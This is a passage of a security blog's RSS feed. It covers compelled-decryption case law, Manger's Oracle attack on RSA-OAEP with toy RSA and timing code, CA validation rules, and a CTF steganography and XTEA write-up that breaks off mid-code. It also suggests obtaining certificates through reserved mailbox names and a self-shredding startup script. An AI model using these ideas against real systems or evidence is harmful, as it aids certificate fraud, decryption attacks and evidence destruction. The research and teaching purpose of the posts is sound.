<li>This is pre-alpha.  There may be straight-out-bugs in my code.
<li>Two people using the same password and scrypt parameters would generate the same public keys.  I think this is less of an issue than Dan does - I assume people using my code would use strong passphrases.
<li>While it works and is usable, it relies on a bunch of tricks/hacks.
<li>The public key generated has a different KeyID each time, because the KeyID is a hash over the public key parameters, which includes the date it was created.
<li>This may generate keys +/- a few bits off the stated length (2047 instead of 2048)
<li>The key generated is unencrypted - meaning there's no passphrase on your secret key.
<li>You'd have to have a crazy threat model for this to be a good idea.  
<li>You don't have that threat model, and if you do, you still shouldn't use this code in real life.
</ul>

<p>The code is <a href="/resources/non-persistent-gpg-keys.tgz" class="themainlink">located here</a>.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-fricosu_part1.html</guid>
		<title>US v Fricosu - Compelled Disclosure of Encryption Keys</title>
		<pubDate>11 Jul 2011 18:36 EST</pubDate>
		<description><![CDATA[
<style type="text/css">
.legal {
   border: 1px dotted #444400;
}
</style>

<p><em>I am not a lawyer, and this blog does not constitute legal analysis.  It should be taken merely as speculation and pointers to topics for you to do your own research on. Throughout this blog post I'm going to use <span class="legal">this notation</span> to indicate a word has a specific legal definition, and I'm not using the word colloquially.</em></p>

<p>One of the biggest targets of armchair lawyers on blogs, twitter, and reddit (myself included) has been whether or not the government can force you to turn over your encryption key.  An actual lawyer, a law professor in fact, has written a series of posts on the theory, and details of the two cases that address the issue.</p>

<ol>

<li><a href="http://cyb3rcrim3.blogspot.com/2006/08/encrypted-hard-drives-and-constitution.html">Encrypted Hard Drives and the Constitution </a> - <strong>August 23, 2006</strong> - The first time the question is raised, in a purely hypothetical way.  It lays some information down you should fully grok - for example Miranda rights don't apply in many cases because you are not in <span class="legal">custody</span> and the 5th Amendment does not apply because you are not being <span class="legal">compelled</span> to produce <span class="legal">testimony</span>.  It references the <a href="http://caselaw.lp.findlaw.com/scripts/getcase.pl?navby=case&court=us&vol=487&page=201">1988 Doe vs United States</a> case which addressed the question of applying the 5th Amendment to physical evidence (like a key to a safe) and to communication (like a memorized combination to a safe).</li>

<li><a href="http://cyb3rcrim3.blogspot.com/2007/12/court-upholds-using-fifth-amendment-to.html">Court upholds using the Fifth Amendment to refuse to disclose your password </a> - <strong>December 15, 2007</strong> - The first post regarding an actual case, United States v. Boucher.  The U.S. District Court for the District of Vermont held that Boucher could invoke the Fifth Amendment and refuse to comply.  It again goes into detail about <span class="legal">testimony</span> and <span class="legal">custody</span>.  </li>

<li><a href="http://cyb3rcrim3.blogspot.com/2009/03/5th-amendment-bummer.html">5th Amendment Bummer</a> - <strong>March 06, 2009</strong> - An update on United States v. Boucher.  The Government appealed, and modified their request.  Now they were no longer after the password, but instead were trying to <span class="legal">compel</span> Boucher to show the unencrypted files to a Grand Jury.  They crucially changed the argument from communication (exempt via the 5th Amendment) to producing physical evidence (not exempt, see Doe vs United States 1988).  The court bought the new argument and stated Boucher must produce the unencrypted contents by the date specified or be held in <span class="legal">contempt</span> (which amounts to sitting in jail until you comply).</li>

<li><a href="http://cyb3rcrim3.blogspot.com/2010/04/passwords-and-5th-amendment-privilege.html">Passwords and the 5th Amendment Privilege</a> - <strong>April 28, 2010</strong> - This post addresses U.S. v. Kirschner a case in the U.S. District Court for the Eastern District of Michigan.  The government erred in this case by specifically seeking testimony and even using the analogy "It's like giving the combination to a safe." which we mentioned earlier was protected.  The government's subpoena was quashed.</li>

</ol>

<p>Now, updates on those two cases.  According to the headline article, "Boucher eventually complied and was convicted."  Brenner speculated the government would appeal to the 6th Circuit in Kirschner (and based on the Obama administration's judicial actions I would expect so too), but I haven't been able to find any evidence of that - so I'm not sure what happened to Kirschner.</p>

<p>Now let's examine the current case - <a href="http://news.cnet.com/8301-31921_3-20078312-281/doj-we-can-force-you-to-decrypt-that-laptop/">US vs Fricosu</a>.  It's in the United States District Court for the District of Colorado.  I'm not sure how Fricosu is represented, but the case gained attention after the EFF <a href="http://www.eff.org/press/archives/2011/07/08">filed an amicus brief</a> in the case Friday.  If you're unfamiliar with the term, it does <em>not</em> mean the EFF is involved in the case or representing Fricosu - only that they're interested in it and are presenting a supporting argument to the court on her behalf.</p>

<p>Now, again, I don't know the exact request made by the prosecutor, but quoting the article:</p>

<blockquote>Prosecutors stressed that they don't actually require the passphrase itself, meaning Fricosu would be permitted to type it in and unlock the files without anyone looking over her shoulder. They say they want only the decrypted data and are not demanding "the password to the drive, either orally or in written form."</blockquote>

<p>As we saw in Boucher, this doesn't bode well because they're taking the physical evidence approach.  <s>The best-case scenario is the prosecution argues the physical evidence approach and the court strikes it down.  We'll have to wait and see.</s> Now the EFF argues in their Amicus Brief that producing the decrypted contents should <strong>not</strong> be required, because doing so is testimony.  Specifically, the government has not shown that Fricosu has control or knowledge of the contents of the laptop, therefore by decrypting the contents she is testifying to its authenticity.  (This has to do with the legal term <span class="legal">foregone conclusion</span>.)  You should definitely read <a href="https://www.eff.org/files/filenode/us_v_fricosu/fricosuamicus7811.pdf">the brief</a> as it goes into a lot of precedent and case law.  It's also worthwhile to note that in Boucher, the contents of the encrypted drive <em>were</em> a foregone conclusion, as Boucher had previously revealed them to a Customs officer.</p>

<p>But there are some other evidentiary issues here.  <em>You should definitely take this with a grain of salt - I've read Law School Evidence books, and did not do well on the practice tests.</em>  With computer cases, there's a lot of chain-of-custody and verification work that's got to be done: image the drive, use a write-blocker, show via chain of custody that it couldn't have been altered... But the process they are describing would shoot the normal evidence-handling process to hell.  It'd be near-impossible to satisfy both sides.</p>

<p>Consider the case where Fricosu enters the password into a specially built program that's designed to decrypt with write-blocker and preserve evidence.  Fricosu would have a strong argument the government could actually obtain the passphrase from her via subtle means.  (I'm assuming the drive in question is the boot drive on a laptop - if it was a truecrypt container, the scenario changes.)  While there may be assurance the evidence wouldn't be altered, there is none the government isn't taking the passphrase.  (Now there could be some shenanigans with the government granting immunity for the passphrase but not the contents... I'm not sure how that'd work.)</p>

<p>Now consider the case where Fricosu enters the passphrase for the laptop in court in front of the grand jury - no write-blocker involved and no protections in place.  Fricosu would have an argument that the evidence could have been altered and should not be admitted (e.g. by normal operating system boot-up, or a malicious virus on the machine, or simply by a script she wrote to delete sensitive files on startup).  These issues <em>can</em> be overcome by the court, but they are argued on their own.  Brenner has <a href="http://cyb3rcrim3.blogspot.com/2010/08/chat-logs-authentication-and-best.html">written articles in this area as well</a>.  On this topic, it'd be trivial for me to write a startup script on my machines that says "Have I been turned on in the last 2 months?  No?  Okay, shred all the sensitive stuff...."</p>

<p>Another nice thing about this case is that, unlike Boucher and Kirschner, Fricosu isn't accused of child pornography.  I imagine it's difficult for lawyers to argue civil liberties when the individual you're protecting is rather obviously someone involved in transporting or concealing child porn.  Certainly there are arguments that everyone deserves a fair trial - and they do... but there's also the reality of the crime.</p>

<hr />

<p><strong>Update</strong>: <em>July 20, 2011</em> Susan Brenner of the previously super-linked <a href="http://cyb3rcrim3.blogspot.com/">cyb3rcrim3</a> has graciously obtained the government motion in the case, sent it to me, and allowed me to post it before her.  You can <a href="/resources/fricosu-motion.pdf">download the pdf here</a> or <a href="https://docs.google.com/a/ritter.vg/viewer?url=http://ritter.vg/resources/fricosu-motion.pdf">view it in google docs</a>.</p>

<p>The motion doesn't go into details about what type of encryption software was used, but it does imply that the entire computer is protected - so probably PGP WDE or Truecrypt.  It gives several details that bear on the argument of whether or not Fricosu has control or knowledge of the computer, and also directly says:</p>

<blockquote>As the act of production might potentially entitle Ms. Fricosu to assert her right to refuse under the Fifth Amendment of the United States constitution, the Government has sought approval to seek this court's grant of limited immunity, thus precluding the Government using her act of producing the unencrypted contents against her in any prosecution.</blockquote>

<p>One of the last arguments made by the EFF in their amicus brief is that Fricosu is justified in refusing to provide the password because that limited immunity does not include a "guarantee against use or derivative use of the information".  That is: </p>

<blockquote>When a witness's act of production is testimonial in character, the government must grant use and derivative-use immunity to satisfy the Constitution's requirements. Hubbell I, 530 U.S. at 41-46.  This means that the government may not use the act of production itself against Fricosu, <em>nor any evidence on the computer derived from the act of production</em>. ... Should the Court decide that Fricosu must supply the data on the laptop in decrypted form, the government will face a "heavy burden of proving that all of the evidence it proposes to use [from the laptop] was derived from legitimate independent sources." (emphasis mine)</blockquote>

<p>The <strong>strongest</strong> argument is this: "I do not believe he can be compelled to reveal the combination to his wall safe".  But where does it come from?  From the Supreme Court case <a href="http://supreme.justia.com/us/487/201/case.html">Doe v United States 487 U. S. 201 (1988)</a>.  But it wasn't the major finding of the case.  Rather, it was made in two places.  The plainer of the two is a comment by Justice Stevens in a dissenting opinion:  "He may in some cases be forced to surrender a key to a strongbox containing incriminating documents, but I do not believe he can be compelled to reveal the combination to his wall safe -- by word or deed."  The other, weaker one, is an implication in a footnote of the Majority Opinion:</p>

<blockquote>We do not disagree with the [prior statement] that "the expression of the contents of an individual's mind" is testimonial communication for purposes of the Fifth Amendment. We simply disagree with the [prior conclusion] that the execution [at issue here] forced petitioner to express the contents of his mind. In our view, [the compulsion] is more like "being forced to surrender a key to a strongbox containing incriminating documents," than it is like "being compelled to reveal the combination to a wall safe."</blockquote>

<p>I heavily hacked that up to make it easier to understand absent details of the Doe case, you can see it in the original form by searching for "wall".  But lawyers are really good at this.  The majority opinion did <em>not</em> say that the wall safe was protected speech like Stevens did, only that this instance was unlike a wall safe.  I think it's plain to see that a wall safe is a very good analogy for encryption.  They're not perfect - but a very good wall safe could not be opened forcibly without destroying the papers inside, and good encryption cannot be opened reasonably.  We have to hope the court finds that producing the contents of a wall safe or encrypted container would be an "expression of the contents of an individual's mind".</p>

<p>Now I wonder about keyfiles.  If the government didn't know how to unlock a truecrypt container, they could try to compel you like this.  But there is no password.  And you tell them this - you tell them it is unlocked with a keyfile.  So they demand you produce the keyfile.  Here's where it gets tricky... Could you say "You have the keyfile already, and my telling you which one it is is protected."?  You can't prove they have the keyfile without giving it to them - there's no zero-knowledge proof possible here.  Any attempt to construct one would fail, because no judge would accept the rigor required for a zero-knowledge proof.  I wonder how keyfiles would be treated...</p>

<p><em>I expect to update this over the next few days as details emerge.  Updates will not trigger a new RSS entry, but will be announced on <a href="http://twitter.com/tomrittervg">Twitter</a>.</em></p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-mangers_oracle.html</guid>
		<title>Beyond Padding Oracle - Manger's Oracle and RSA OAEP Padding</title>
		<pubDate>2 Jun 2011 12:56:34 EST</pubDate>
		<description><![CDATA[
<p>Several months ago I was looking at the proceedings from <a href="https://hashdays.ch/">#days 2010</a> and read <a href="http://crypto.junod.info/">Pascal Junod</a>'s slides <a href="http://crypto.junod.info/hashdays10_talk.pdf">Open-Source Cryptographic Libraries and Embedded Platforms</a>. In them, he mentioned James Manger's attack on RSA OAEP, a padding scheme first defined in PKCS #1 v2.0. I hadn't heard of it before, and it interested me enough to investigate. (The paper is available via <a href="http://www.google.com/search?q=%22A+Chosen+Ciphertext+Attack+on+RSA+Optimal+Asymmetric+Encryption+Padding+(OAEP)+as+Standardized+in+PKCS+%231+v2.0%22">Google</a> or <a href="http://portal.acm.org/citation.cfm?id=704143">ACM</a> if you're a member.)</p>

<p>The basics of the attack are similar to the Padding Oracle attack: a small piece of information is exposed via error messages, and with some clever math you can use it to recover the plaintext from the ciphertext.  After the ciphertext is decrypted, the OAEP decoding process begins.  The decrypted plaintext is supposed to fit in one less byte than the maximum size of the ciphertext.  If the plaintext does not have a 00 in the highest byte, the ciphertext is considered to have been tampered with and an error is returned.  Because of the multiplicative properties of RSA, you can directly influence the plaintext p by multiplying the ciphertext c by x<sup>e</sup> mod n - where e is the exponent from the public key, n the modulus, and x the arbitrary number you want to multiply the plaintext by.  This will produce a plaintext p*x mod n after decryption.</p>
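<p>The multiplicative property the attack relies on is easy to demonstrate with textbook RSA.  A minimal sketch (toy parameters, no padding, a hopelessly insecure key size - purely to show the blinding math):</p>

```python
# Toy textbook-RSA parameters: p=61, q=53 (illustrative only).
n, e, d = 3233, 17, 2753

m = 42                      # original plaintext
c = pow(m, e, n)            # ciphertext

# Multiply the ciphertext by x^e mod n...
x = 2
c_tampered = (c * pow(x, e, n)) % n

# ...and the decryption comes out multiplied by x mod n.
assert pow(c_tampered, d, n) == (m * x) % n   # 84
```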

<p>Manger's Oracle relies on manipulating the plaintext and detecting when it has overflowed into the highest byte.  Using a method reminiscent of <a href="http://en.wikipedia.org/wiki/Binary_search_algorithm">binary search</a>, the possible values of the plaintext are narrowed down until only one remains - allowing recovery of the plaintext from the ciphertext.  The number of oracle queries needed depends on keysize; for 1024, it's around 1200.</p>

<p>I checked the popular implementations of RSA-OAEP and found none of them vulnerable to Manger's Oracle.  OpenSSL specifically protects against it, calling Manger out by name in the comments.  BouncyCastle and the .NET implementation were secure because they didn't throw an error if the first byte was non-zero (probably on the assumption that another part of OAEP, the hash, wouldn't match).  Libgcrypt didn't implement RSA-OAEP - a patch had been provided a few years ago, but it was never merged... until a few weeks ago when it was committed to trunk.</p>

<p>The new code wasn't actually directly vulnerable - the same error code was returned no matter the type of error that occurred.  Regardless, I decided this would be a fun exercise and set about implementing the attack.  I got it working; but only after editing the source of libgcrypt to 'cheat', providing my own oracle.  I managed to find a mistake in the original paper too, a <acronym title="Mathematical function that rounds down">floor()</acronym> that should have been a <acronym title="Mathematical function that rounds up">ceil()</acronym> - detailed in the code linked later.</p>

<p>Since I modified the libgcrypt code to provide an oracle, it was an overly contrived example, but it seemed like it might be possible to exploit it using a timing attack.  After measuring and graphing the differences between the two cases, I saw you <em>could</em> determine the error from timing information - so long as you looked at the percentiles over a sufficient number of trials, as shown below.  It isn't 100% reliable, but I was able to get a working proof of concept going with just timing information.</p>
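<p>The percentile comparison can be sketched in a few lines.  This isn't the harness I used - just an illustration, with two stand-in code paths, of why looking at low percentiles over many trials helps: OS and scheduler noise only ever <em>adds</em> time, so the low end of each distribution is the cleanest signal:</p>

```python
import time

def sample_times(fn, trials=300):
    """Collect execution-time samples for one code path."""
    samples = []
    for _ in range(trials):
        t0 = time.perf_counter()
        fn()
        samples.append(time.perf_counter() - t0)
    return samples

def percentile(samples, p):
    """Return the p-th percentile (0 < p < 100) of the samples."""
    ordered = sorted(samples)
    return ordered[int(len(ordered) * p / 100)]

# Two stand-in code paths with a real (if small) timing difference.
fast_path = lambda: sum(range(100))
slow_path = lambda: sum(range(5000))

# Noise only adds time, so the low percentiles separate cleanly.
assert percentile(sample_times(fast_path), 10) < percentile(sample_times(slow_path), 10)
```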

<p><img src="/resources/mangers-oracle/timing-small.png" alt="Timing Comparison" /><br />
<em>Left two box plots show the longer execution time, right two show the shorter.</em></p>

<p>I've published the code to exploit the oracle in a contrived case, and included the code and steps to demonstrate the timing differential.  <a href="https://github.com/GDSSecurity/mangers-oracle">The code is on github</a>, and as far as I know, this is the only public implementation of Manger's Oracle. (Although apparently it is assigned as <a href="http://stackoverflow.com/questions/5889519/java-rsaes-oaep-attack">homework</a> somewhere...)</p>

<p><em>"OAEP Padding" is indeed an example of <a href="http://en.wikipedia.org/wiki/RAS_syndrome">RAS Syndrome</a></em></p>

<p>This writeup originally appeared on the <a href="http://blog.gdssecurity.com/labs/2011/6/2/beyond-padding-oracle-mangers-oracle-and-rsa-oaep-padding.html">Gotham Digital Science blog</a>.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-cab_forum_draft.html</guid>
		<title>Examining the CA/Browser Forum Requirements Draft</title>
		<pubDate>25 Apr 2011 23:36 EST</pubDate>
		<description><![CDATA[
<p>I've heard it from three different sources: Certificate Authorities will make verification more painful, more costly, and more difficult - but only if they're mandated industry-wide.  They can't add overhead their competitors can skip.  The CAs and Browsers have been working together in the <a href="http://www.cabforum.org/">CA/Browser Forum</a> to come up with new requirements for Certificate Authorities.  The Public Comment period on the draft of these requirements is ongoing until the end of May, and takes place on <a href="http://groups.google.com/group/mozilla.dev.security.policy/topics">mozilla.dev.security.policy</a>.  I read through the draft, and I didn't have many actual comments (aside from one question I posted to the SSL Observatory list and one clarification I requested) - but I wanted to highlight a few points from it.</p>

<p>The requirements are "a subset of the requirements that a Certification Authority must meet in order for its Certificates to be Publicly Trusted."  They apply only to SSL/TLS Certificates: "Similar requirements for  code signing,  S/MIME, time-stamping, VoIP, IM, Web services, etc. may be covered in future versions."</p>

<hr width="50%" />

<p>It talks a lot about verification requirements to ensure the applicant is who she says she is in the event the cert will contain Subject Identity Information, but more importantly talks about how the domain and/or IP addresses will be verified:</p>

<blockquote>
If the CA uses the Internet mail system to confirm that the Applicant has authorization from the Domain Name Registrant to obtain a Certificate for the requested Fully-Qualified Domain Name, the CA MUST use a mail system address formed in one of the following ways:
<ol>
<li>Supplied by the Domain Name Registrar</li>
<li>Taken from the Domain Name Registrant's "registrant", "technical", or "administrative" contact information, as it appears in the Domain's WHOIS record</li>
<li>By prepending a local part to a Domain Name as follows:
<ol>
<li>Local part - One of the following: "admin", "administrator", "webmaster", "hostmaster", or "postmaster"</li>
<li>Domain Name - Formed by pruning zero or more components from the Registered Domain Name or the requested Fully-Qualified Domain Name.</li>
</ol></li>
</ol>
</blockquote>

<p>So the old trick of registering one of these reserved email addresses might just work depending on the domain.  And if the domain uses Anonymous Whois (Proxy Registration), that organization must be contacted to confirm the application is legit (so you could target those guys).</p>

<p>What is interesting though, is the wording in that section, emphasis mine: "<u>If</u> the CA relies on a confirmation of the right to  use or control the Registered Domain Name(s) from a Domain Name Registrar", "<u>If</u> the CA uses the Internet mail system to confirm", "<u>If</u> the Domain Name Registrant has used a private, anonymous, or proxy registration service".  It's a bunch of If's.  There's no MUST or SHOULD stating that these are the only methods allowed.</p>

<p>Which <a href="http://groups.google.com/group/mozilla.dev.security.policy/browse_thread/thread/5de461911b978798/9d8aa7f3c1cee176#9d8aa7f3c1cee176">led me to ask about it</a> - are these the only methods?  Is this vagueness intentional?  I gave the example of another verification method being a telephone call to the number in the WHOIS information.  The responses are coming in privately and will be posted shortly I'm sure - but it does seem to be intentional.  As Ian G says, "the high level document should state the high level requirement, and leave implementation to the CA".  He goes on to say that the audit process is intended to ensure that the implementation is valid.  (I'll talk about that below.)  And Stephen Davidson mentions "There are a number of US patents covering aspects of domain validation for SSL certificates. The BR has to tread a fine line between laying out good practice and requiring CAs to follow a process that might intrude on a patented process."  Sheesh.  Patents on how to check someone's ID.  /grumble</p>

<p><strong>Edit:</strong> It seems this topic may have been accidentally double posted (I submitted it first as a new topic, and a couple days later - after it never showed up - as a reply).  The two threads are <a href="http://groups.google.com/group/mozilla.dev.security.policy/browse_thread/thread/4afb410b042c7c02/8398f0a0b4ee849e#8398f0a0b4ee849e">BR11.1 Authorization by Domain Name Registrant</a> and <a href="http://groups.google.com/group/mozilla.dev.security.policy/browse_thread/thread/5de461911b978798/9d8aa7f3c1cee176#9d8aa7f3c1cee176">BR11 -Validation Practices</a>.  A proposal to have the methods listed in a wiki page referenced by the requirements has seen support, to ensure the methods are acceptable.  There are definitely some questions about how that would work (can methods be removed? what's the approval process?) - but it's a step forward, and it's what I wanted to point out.</p>

<hr width="50%" />
<a name="audit"></a>
<p>This next bit about audits is notable:</p>

<blockquote>
<p>
At least once every eleven to thirteen months following the previous independent audit (in order to accommodate an auditor's schedule), the CA MUST be independently examined for compliance with the requirements of one of the eligible audit schemes listed in Section 16.1.
</p>
...
<p>
The audit report MUST be made publicly available.  For both government and commercial CAs, the CA SHOULD make its audit report publicly available no later than three months after the end of the audit period. In the event of a delay greater than three months, and if so requested by an Application Software Supplier, the CA MUST provide an explanatory letter signed by its auditor.
</p>
</blockquote>

<p>An "Application Software Supplier" is one of Apple, Google, KDE, Microsoft, Opera, RIM, and Mozilla.  More interesting are the "eligible audit schemes" listed:</p>

<ul>
<li>WebTrust for Certification Authorities v1.0 or later</li>
<li>ETSI TS 101 456 v1.2.1 or later</li>
<li>ETSI TS 102 042 V1.1.1 or later</li>
<li>ISO 21188:2006, completed by either a licensed WebTrust for CAs auditor, or an audit authority operating according to the laws and policies for assessors in the jurisdiction of the CA</li>
<li>If a Government CA is legally required to use a different internal audit scheme, it may use such scheme provided that: (a) the audit encompasses all requirements of one of the above schemes, and (b) the audit is performed by an Appropriate Internal Supervisory Government Auditing Agency, separate from the CA, that meets the requirements of Section 16.4.</li>
</ul>

<p>Since the people who read audit schemes and the people who read this blog are wholly orthogonal - here are a few light details.  First off, these are <B>audits</B>, not penetration tests or code review.  And if we learned something from the Comodo debacle (assuming you believe the posted code), it's that poor code and mediocre defenses do exist even in critical endpoints.  The types of issues that exist in the nitty-gritty (hardcoded passwords, exposed administrative interfaces, password-based authentication instead of client certificates, and conceivably whatever bug enabled the Iranian attacker to get the DLL in the first place) should have been identified by a pen test.  But an audit is more likely to gloss over the details.</p>

<p>But, putting aside my feelings about audits compared to penetration tests (or an 'Advanced Persistent Test' if you're AR), it <em>is</em> encouraging that the audit report is required to be made available.</p>

<hr width="50%" />

<p>There's this small bit:</p>

<blockquote>
<p>The CA and its RAs SHALL NOT archive the Subscriber Private Key.</p>
<p>If the CA, or any of its designated RAs  were to  generate a Private Key on behalf of the Subscriber, then the CA MUST encrypt the Private Key for transport to the Subscriber.</p>
<p>If  the CA, or any of its designated RAs were to become aware that a  Subscriber's Private Key had been communicated to any person or organization not affiliated with the  Subscriber, then the CA MUST revoke any certificates that include the Public Key corresponding to the Private Key that has been communicated.</p>
</blockquote>

<p>I don't see SHALL used too often, but <a href="http://www.ietf.org/rfc/rfc2119.txt">it is a synonym for MUST</a>, to save you the time of looking it up.</p>

<hr width="50%" />

<p>Now, for the paranoid crowd: what about collusion between a CA and the government?  If it was proven that a CA had issued a cert for government interception, that CA would pretty quickly be untrusted by users, and probably browsers as well.  It's incentive for a CA not to do so, since such an action puts its business at risk.  But let's check the relevant sections of the doc:</p>

<blockquote>
<p><b>8.1 Compliance</b></p>
<p>The CA MUST at all times: Comply with all law applicable to its business and the Certificates it issues in each jurisdiction where it operates</p>
</blockquote>

<p>Could a judge order a CA to do the government's bidding and sign a CSR for law enforcement?  Well, practically speaking I'm not qualified to answer this.  There's not a lot of people who are.  I credit Dino Dai Zovi when I say: "The people who are qualified to speak about the topic won't and can't, so by definition the only people speaking are people unqualified."  I'll just note that by stretching parts of the Requirements (stretching "right to use, or had control of, the Domain Name and IP address") and emphasizing compliance with applicable law - they'd have somewhat of a defense from an industry sanction.  Not from the people on the internet of course.</p>

<hr width="50%" />

<p>Now what about law enforcement trying to force a CA to revoke a cert?  This was a question I had that I <a href="https://mail1.eff.org/pipermail/observatory/2011-April/000203.html">posted to the SSL Observatory list</a>.  It came about from the following segments:</p>

<blockquote>
<p><b>10.3.2 Agreement Requirements</b></p>
<p>The Subscriber Agreement MUST contain provisions imposing on the Applicant itself (or made by the Applicant on behalf of its principal or agent under a subcontractor or hosting service relationship) the following obligations and warranties:</p>

<ol start="4">
<li>Use of  Certificate:  An obligation and warranty to install the Certificate only on servers that are accessible at the subjectAltName(s) listed in the Certificate, and to use the Certificate solely in compliance with all applicable laws and solely in accordance with the Subscriber Agreement</li>
</ol>

<p>...</p>

<p><b>12.2.3 Investigation</b></p>
<p>The CA MUST begin investigation of a Certificate Problem Report within twenty-four hours of receipt, and decide whether revocation or other appropriate action is warranted based on at least the following criteria:</p>
<ol>
<li>The nature of the alleged problem</li>
<li>The number of Certificate Problem Reports received about a particular Certificate or Subscriber</li>
<li>The type of the complainants (for example, a complaint from a law enforcement official that a Web site is engaged in illegal activities should carry more weight than a complaint from a consumer alleging that  she didn't receive the goods she ordered)</li>
<li>Relevant legislation.</li>
</ol>
</blockquote>

<p>The certificate recipient must abide by "applicable laws" - but those laws may differ from the Certificate Authority's.  Then a specific scenario of law enforcement complaining to a CA is given.  When you couple that with <a href="http://www.techdirt.com/articles/20110201/10252412910/homeland-security-seizes-spanish-domain-name-that-had-already-been-declared-legal.shtml">the DOJ's over-reaching domain name seizures</a> - well, personally I think it's a matter of when, not if, the government uses this tactic to harass sites extra-jurisdictionally.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-regional_broadcast.html</guid>
		<title>Regional Broadcast Using an Atmospheric Link Layer</title>
		<pubDate>1 Apr 2011 00:00:00 GMT</pubDate>
		<description><![CDATA[
<p>I've been working on a document for a while, and I'm happy to announce it's made its way through the committees and has been accepted by the <a href="http://en.wikipedia.org/wiki/Internet_Engineering_Task_Force">IETF</a>.  It's the result of about 2 years of (non-contiguous) idle thought, bouncing ideas off people, and editing.  But what is it about?!  Well, as the internet has grown, the concept of a LAN has changed from the original concept of a <strong>Local Area</strong> Network, where "Local" meant geographic.  Now, "Local" is a logical grouping - a company has a LAN, but its members are spread across the globe, linked by VPNs.  I wanted to get back to <strong>geographic based packet transmission</strong>.  It's all the rage after all - every social media app wants to show you what's happening nearby, where your friends are, and so on.</p>

<p>So this is my contribution.  Using the methods defined in the RFC, you can transmit text or binary data to a local geographic area.  It doesn't add congestion on existing copper or fiber, it's carrier independent, it doesn't require or deplete mobile data plans.  You can use it just as easily in New York City as in Kigali.  And since we care about regional transmission, we can adapt some settings to local standards, like the UTF Code Page most common.  Anyway, here it is: <a href="http://tools.ietf.org/html/rfc6217" class="themainlink">RFC 6217: Regional Broadcast Using an Atmospheric Link Layer</a>.</p>  

<p>There are a few rough patches in there regarding technicalities or practicality (trust me, I agonized over them), but I think they accurately indicate the point behind the illustration.</p>

<p><strong>Update:</strong> <a href="http://tech.slashdot.org/story/11/04/01/1728250/Regional-Broadcast-Using-an-Atmospheric-Link-Layer">I made Slashdot</a></p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-bleed_through_badges.html</guid>
		<title>bleed-through badges</title>
		<pubDate>9 Feb 2011 23:36:00 EST</pubDate>
		<description><![CDATA[
<p>I got some bleed-through badges at a client the other month.  I was curious to see if I could somehow <a href="/security_adventures_badges.html" class="themainlink">prevent the bleed-through</a>, and you absolutely can.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-csaw_ctf_final.html</guid>
		<title>NYU Poly CSAW CTF Finals Challenge</title>
		<pubDate>18 Nov 2010 23:08:34 EST</pubDate>
		<description><![CDATA[
<p>A few weeks ago <a href="http://www.poly.edu/">NYU Polytechnic</a> held the final round of their <a href="http://www.poly.edu/csaw-CTF">Capture the Flag</a>. Marcin <a href="http://blog.gdssecurity.com/labs/2010/10/6/crypto-challenges-at-the-csaw-2010-application-ctf-qualifyin.html">previously wrote about his challenge for the qualification round</a>. We both wrote challenges for the final round, and my challenge was primarily based around steganographic tricks with file formats, surrounded by some simple cryptography.</p>

<h3>Introduction</h3>

<p>The first things you received were a bat script and a multi-part file, without an extension. The bat file copied the second file twice and appended .jpg and .zip extensions as hints. It's a fairly well known secret that you can combine jpg and zip files into a single file, and it's 'valid' as both - but 'valid' is in quotes for a reason. You actually need to do a bunch of byte manipulation to get this into a legal format - you can read about how it works <a href="http://stackoverflow.com/questions/1820291/jpgzip-file-combination-problem-with-zip-format/1867553#1867553">over in my stackoverflow answer here</a>.</p>
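<p>The zip half of the trick is easy to see in Python: zip readers locate the archive from the <em>end</em> of the file (the End of Central Directory record), so prepended bytes are tolerated.  Making the combination strictly legal as both formats takes the byte surgery described in the stackoverflow answer; this sketch only shows the forgiving-reader case, and the "jpeg" bytes are a fake stand-in:</p>

```python
import io
import zipfile

# Fake jpeg stand-in: start-of-image marker, junk, end-of-image marker.
jpeg_part = b"\xff\xd8\xff\xe0" + b"not really a jpeg" + b"\xff\xd9"

# Build a real zip in memory.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("flag.txt", "hack the planet")
zip_part = buf.getvalue()

# Naive concatenation: jpeg bytes first, zip bytes after.
combined = jpeg_part + zip_part

# The result still opens fine as a zip.
with zipfile.ZipFile(io.BytesIO(combined)) as z:
    assert z.read("flag.txt") == b"hack the planet"
```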

<p>The jpg-part of the multi-part file was a reference to the movie Hackers, after which the challenge was themed. Within the zipfile-part was an executable which when run would look for the multi-part file and then display a prompt:</p>

<p><img src="/resources/ctf-challenge/ctf-challenge-prompt.png" alt="Password Prompt UI"/></p>

<p>Entering Hackers-themed words would get you images, an mp3 snippet, hints, and even the hacker's manifesto:<br /><img src="/resources/ctf-challenge/ctf-challenge-answers.png" alt="Decrypted Content Examples" /></p>

<h3>Exploring the Code</h3>

<p>But none of these were the key of course.  .Net is trivial to disassemble, and I was counting on that.  The code in the program seeks past the jpg-part of the multi-part file, and then reads blocks of data from the middle - stopping when it reaches the zip-part of the file. (So the file had three parts: jpg, zip, and in-between: an arbitrary binary format).  The password entered is hashed, and used to key a dictionary.  The value of the dictionary is used to attempt decryption of each block of data read from the middle of the file.  When it succeeds it will - depending on a sentinel byte - show an image, text, play a song, or write out a file.  Now because you can disassemble the program - you can see all the dictionary values, and therefore you can decrypt the blocks of data without ever needing to know the password.</p>

<p>But that would be too easy - so not all the encryption keys are in the dictionary.  If your hashed password is not found in the dictionary, it is used itself.  The encryption algorithm chosen was XTEA, and the key itself was neutered down to 27 bits.  The encrypted blocks were easily brute-forced. (And XTEA is a very simple algorithm to implement).</p>
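<p>For the curious, XTEA really is tiny.  Below is a standard XTEA implementation plus a brute-force sketch - this is <em>not</em> the challenge's actual code, and the key layout (only the low 27 bits of the first key word varying) is my assumption for illustration:</p>

```python
MASK = 0xFFFFFFFF
DELTA = 0x9E3779B9

def xtea_encrypt(block, key, rounds=32):
    """Encrypt one 64-bit block (a pair of 32-bit words) under a four-word key."""
    v0, v1 = block
    s = 0
    for _ in range(rounds):
        v0 = (v0 + ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + key[s & 3]))) & MASK
        s = (s + DELTA) & MASK
        v1 = (v1 + ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + key[(s >> 11) & 3]))) & MASK
    return v0, v1

def xtea_decrypt(block, key, rounds=32):
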